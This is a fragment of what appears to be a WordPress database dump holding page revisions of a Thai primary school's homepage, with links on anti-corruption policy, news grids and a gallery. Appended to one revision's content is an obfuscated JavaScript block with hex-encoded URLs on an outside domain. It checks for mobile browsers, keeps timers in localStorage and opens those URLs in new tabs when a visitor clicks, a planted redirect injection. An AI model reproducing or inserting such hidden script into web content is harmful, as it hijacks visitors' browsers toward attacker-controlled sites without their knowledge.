{\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:06:16','2024-07-27 05:06:16','',14,'http://pakhaeng.ssk.in.th/?p=130',0,'revision','',0),
(131,1,'2024-07-27 12:07:53','2024-07-27 05:07:53','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button 